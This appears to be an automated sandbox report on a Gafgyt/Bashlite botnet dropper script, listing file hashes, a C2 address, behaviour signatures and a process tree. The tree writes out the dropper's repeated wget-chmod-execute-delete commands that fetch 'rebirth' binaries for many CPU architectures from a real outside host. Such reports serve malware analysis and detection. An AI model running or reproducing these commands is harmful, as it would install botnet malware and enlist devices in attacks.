Analysis

  • max time kernel
    95s
  • max time network
    133s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20231215-en
  • resource tags
    arch:amd64, arch:i386, image:ubuntu1804-amd64-20231215-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    25/01/2024, 06:46

General

  • Target

    bins.sh

  • Size

    1KB

  • MD5

    b2cfbd80cdf94849b51fb78a928e5d58

  • SHA1

    ce6aaa804e6d7285b704169d491b1f7db0d60507

  • SHA256

    6e6727498e4e5c70ace009cb48fa6d141ce81f84eac03c79ac95f42b14ff683d

  • SHA512

    8c8bedefa4bb62759bef189232eeefb25b0115411c77b290342cd1f0362956783d77f37b2afaaf30a5db6b7be4a339509ab22e91132ae79c030d3f3c6a9e292f

Score
10/10

Malware Config

Extracted

Family

gafgyt

C2

45.95.169.10:666

Signatures

  • Detected Gafgyt variant 1 IoCs
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • Executes dropped EXE 1 IoCs
  • Reads system routing table 1 TTPs 2 IoCs

    Gets active network interfaces from /proc virtual filesystem.

  • Reads system network configuration 1 TTPs 2 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Writes file to tmp directory 13 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:1551
      • /usr/bin/wget
        wget http://45.95.169.10/rebirth.arm4
        2⤵
        • Writes file to tmp directory
        PID:1552
      • /bin/chmod
        chmod +x rebirth.arm4
        2⤵
        PID:1557
      • /tmp/rebirth.arm4
        ./rebirth.arm4
        2⤵
        • Executes dropped EXE
        PID:1558
      • /bin/rm
        rm -rf rebirth.arm4
        2⤵
        PID:1560
      • /usr/bin/wget
        wget http://45.95.169.10/rebirth.arm4t
        2⤵
        • Writes file to tmp directory
        PID:1561
      • /bin/chmod
        chmod +x rebirth.arm4t
        2⤵
        PID:1562
      • /tmp/rebirth.arm4t
        ./rebirth.arm4t
        2⤵
        PID:1563
      • /bin/rm
        rm -rf rebirth.arm4t
        2⤵
        PID:1565
      • /usr/bin/wget
        wget http://45.95.169.10/rebirth.arm5
        2⤵
        • Writes file to tmp directory
        PID:1566
      • /bin/chmod
        chmod +x rebirth.arm5
        2⤵
        PID:1567
      • /tmp/rebirth.arm5
        ./rebirth.arm5
        2⤵
        PID:1568
      • /bin/rm
        rm -rf rebirth.arm5
        2⤵
        PID:1570
      • /usr/bin/wget
        wget http://45.95.169.10/rebirth.arm6
        2⤵
        • Writes file to tmp directory
        PID:1571
      • /bin/chmod
        chmod +x rebirth.arm6
        2⤵
        PID:1572
      • /tmp/rebirth.arm6
        ./rebirth.arm6
        2⤵
        PID:1573
      • /bin/rm
        rm -rf rebirth.arm6
        2⤵
        PID:1575
      • /usr/bin/wget
        wget http://45.95.169.10/rebirth.i686
        2⤵
        • Writes file to tmp directory
        PID:1576
      • /bin/chmod
        chmod +x rebirth.i686
        2⤵
        PID:1577
      • /tmp/rebirth.i686
        ./rebirth.i686
        2⤵
        • Reads system routing table
        • Reads system network configuration
        PID:1578
      • /bin/rm
        rm -rf rebirth.i686
        2⤵
        PID:1581
      • /usr/bin/wget
        wget http://45.95.169.10/rebirth.m68
        2⤵
        • Writes file to tmp directory
        PID:1582
      • /bin/chmod
        chmod +x rebirth.m68
        2⤵
        PID:1583
      • /tmp/rebirth.m68
        ./rebirth.m68
        2⤵
        PID:1584
      • /bin/rm
        rm -rf rebirth.m68
        2⤵
        PID:1586
      • /usr/bin/wget
        wget http://45.95.169.10/rebirth.mips
        2⤵
        • Writes file to tmp directory
        PID:1587
      • /bin/chmod
        chmod +x rebirth.mips
        2⤵
        PID:1588
      • /tmp/rebirth.mips
        ./rebirth.mips
        2⤵
        PID:1589
      • /bin/rm
        rm -rf rebirth.mips
        2⤵
        PID:1591
      • /usr/bin/wget
        wget http://45.95.169.10/rebirth.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1592
      • /bin/chmod
        chmod +x rebirth.mpsl
        2⤵
        PID:1593
      • /tmp/rebirth.mpsl
        ./rebirth.mpsl
        2⤵
        PID:1594
      • /bin/rm
        rm -rf rebirth.mpsl
        2⤵
        PID:1596
      • /usr/bin/wget
        wget http://45.95.169.10/rebirth.ppc
        2⤵
        • Writes file to tmp directory
        PID:1597
      • /bin/chmod
        chmod +x rebirth.ppc
        2⤵
        PID:1598
      • /tmp/rebirth.ppc
        ./rebirth.ppc
        2⤵
        PID:1599
      • /bin/rm
        rm -rf rebirth.ppc
        2⤵
        PID:1601
      • /usr/bin/wget
        wget http://45.95.169.10/rebirth.spc
        2⤵
        • Writes file to tmp directory
        PID:1602
      • /bin/chmod
        chmod +x rebirth.spc
        2⤵
        PID:1603
      • /tmp/rebirth.spc
        ./rebirth.spc
        2⤵
        PID:1604
      • /bin/rm
        rm -rf rebirth.spc
        2⤵
        PID:1606
      • /usr/bin/wget
        wget http://45.95.169.10/rebirth.x86
        2⤵
        • Writes file to tmp directory
        PID:1607
      • /bin/chmod
        chmod +x rebirth.x86
        2⤵
        PID:1608
      • /tmp/rebirth.x86
        ./rebirth.x86
        2⤵
        • Reads system routing table
        • Reads system network configuration
        PID:1609
      • /bin/rm
        rm -rf rebirth.x86
        2⤵
        PID:1612
      • /usr/bin/wget
        wget http://45.95.169.10/rebirth.sh4
        2⤵
        • Writes file to tmp directory
        PID:1613
      • /bin/chmod
        chmod +x rebirth.sh4
        2⤵
        PID:1614
      • /tmp/rebirth.sh4
        ./rebirth.sh4
        2⤵
        PID:1615
      • /bin/rm
        rm -rf rebirth.sh4
        2⤵
        PID:1617
      • /usr/bin/wget
        wget http://45.95.169.10/rebirth.arm7
        2⤵
        • Writes file to tmp directory
        PID:1618
      • /bin/chmod
        chmod +x rebirth.arm7
        2⤵
        PID:1619
      • /tmp/rebirth.arm7
        ./rebirth.arm7
        2⤵
        PID:1620
      • /bin/rm
        rm -rf rebirth.arm7
        2⤵
        PID:1622

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/rebirth.arm4

    Filesize

    108KB

    MD5

    fb5cfb28c8938312a3528278742d404d

    SHA1

    f8ec0f9eaafc09ad3e10d4854bd798b892b2f9f6

    SHA256

    aa40049525de986cc33f4d7cd663fb09e825d54c68d37244921172bb375ba513

    SHA512

    4e04556dd0ced7c23ff82257eee81fb10261cdf4e5a99459efc49e8a515485b2b99916bb2301434ca5d90b8e97df788db6448004fa15820435009da395f3d278